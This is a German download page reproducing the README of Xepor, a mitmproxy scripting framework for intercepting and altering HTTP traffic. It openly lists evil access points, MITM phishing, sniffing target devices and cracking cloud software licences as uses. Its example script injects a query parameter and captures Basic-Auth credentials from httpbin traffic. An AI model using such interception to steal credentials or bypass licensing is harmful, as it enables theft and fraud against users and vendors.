Startseite>JSP-Quellcode>Andere Kategorien
Herunterladen

Xepor

Xepor (ausgesprochen /ˈzɛfə/ , zephyr) ist ein Web-Routing-Framework für Reverse Engineers und Sicherheitsforscher. Es stellt eine Flask-ähnliche API bereit, mit der Hacker HTTP-Anfragen und/oder HTTP-Antworten in einem benutzerfreundlichen Codierungsstil abfangen und ändern können.

Dieses Projekt soll mit mitmproxy verwendet werden. Benutzer schreiben Skripte mit xepor und führen das Skript in mitmproxy mit mitmproxy -s your-script.py aus.

Wenn Sie vom PoC zur Produktion übergehen möchten, von der Demo (z. B. http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) zu etwas, das Sie mit Ihrem WiFi Pineapple herausnehmen können, dann Xepor ist für Sie!

Merkmale

  1. Codieren Sie alles mit @api.route() , genau wie Flask! Schreiben Sie alles in ein Skript und kein if..else sonst“ mehr.
  2. Behandeln Sie mehrere URL-Routen, sogar mehrere Hosts in einer InterceptedAPI Instanz.
  3. Für jede Route können Sie wählen, ob Sie die Anfrage ändern möchten, bevor Sie eine Verbindung zum Server herstellen (oder sogar eine gefälschte Antwort ohne Verbindung zum Upstream zurücksenden) oder ob Sie die Antwort ändern möchten, bevor Sie sie an den Benutzer weiterleiten.
  4. Blacklist-Modus oder Whitelist-Modus. Erlauben Sie nur in Skripts definierten URL-Endpunkten die Verbindung zum Upstream und blockieren Sie alles andere (in bestimmten Domänen) mit HTTP 404. Geeignet für transparentes Proxying.
  5. Definition und Abgleich von für Menschen lesbaren URL-Pfaden mithilfe von Parse
  6. Host-Neuzuordnung. Definieren Sie Regeln, um von Ihren gefälschten Hosts zum echten Upstream umzuleiten. Regex-Matching wird unterstützt. Am besten geeignet für SSL-Stripping und serverseitiges Lizenzknacken !
  7. Plus alles Gute von mitmproxy! ALLE Betriebsmodi ( mitmproxy / mitmweb + regular / transparent / socks5 / reverse:SPEC / upstream:SPEC ) werden vollständig unterstützt.

Anwendungsfall

  1. Böser AP und Phishing durch MITM.
  2. Schnüffeln Sie den Datenverkehr vom Zielgerät über iptables + transparenten Proxy und ändern Sie die Nutzlast mit xepor im laufenden Betrieb.
  3. Knackende Cloud-basierte Softwarelizenz. Siehe Beispiele/krisp/ als Beispiel.
  4. Schreiben Sie einen komplizierten Webcrawler in ca. 100 Codezeilen . Siehe Beispiele/polyv_scrapper/ als Beispiel.
  5. ... und viele mehr.

SSL-Stripping wird von diesem Projekt NICHT bereitgestellt.

Installation 

pip install xepor

Schnellstart

Nehmen Sie als Beispiel das Skript aus examples/httpbin. 

mitmweb -s example/httpbin/httpbin.py

Stellen Sie Ihren Browser-HTTP-Proxy auf http://127.0.0.1:8080 ein und greifen Sie unter http://127.0.0.1:8081/ auf die Weboberfläche zu.

Senden Sie eine GET-Anfrage von http://httpbin.org/#/HTTP_Methods/get_get. Dann können Sie die von Xepor vorgenommene Änderung in der Mitmweb-Schnittstelle, den Browser-Entwicklungstools oder Wireshark sehen.

Die httpbin.py macht zwei Dinge.

  1. Wenn der Benutzer auf http://httpbin.org/get zugreift, fügen Sie einen Abfragezeichenfolgenparameter payload=evil_param in die HTTP-Anfrage ein.
  2. Wenn der Benutzer auf http://httpbin.org/basic-auth/xx/xx/ zugreift (wir tun einfach so, als ob wir das Passwort nicht kennen), schnüffeln Sie Authorization von HTTP-Anfragen aus und geben Sie dem Angreifer das Passwort aus.

Genau das, was mitmproxy immer tut, aber mit Code, der auf xepor -Art geschrieben ist. 

 # https://github.com/xepor/xepor-examples/tree/main/httpbin/httpbin.py
from mitmproxy . http import HTTPFlow
from xepor import InterceptedAPI , RouteType


HOST_HTTPBIN = "httpbin.org"

api = InterceptedAPI ( HOST_HTTPBIN )


@ api . route ( "/get" )
def change_your_request ( flow : HTTPFlow ):
    """
    Modify URL query param.
    Test at:
    http://httpbin.org/#/HTTP_Methods/get_get
    """
    flow . request . query [ "payload" ] = "evil_param"


@ api . route ( "/basic-auth/{usr}/{pwd}" , rtype = RouteType . RESPONSE )
def capture_auth ( flow : HTTPFlow , usr = None , pwd = None ):
    """
    Sniffing password.
    Test at:
    http://httpbin.org/#/Auth/get_basic_auth__user___passwd_
    """
    print (
        f"auth @ { usr } + { pwd } :" ,
        f"Captured { 'successful' if flow . response . status_code < 300 else 'unsuccessful' } login:" ,
        flow . request . headers . get ( "Authorization" , "" ),
    )


addons = [ api ]
Expandieren
Zusätzliche Informationen
Ähnliche Anwendungen
Empfohlen für Sie
Ähnliche Nachrichten Alle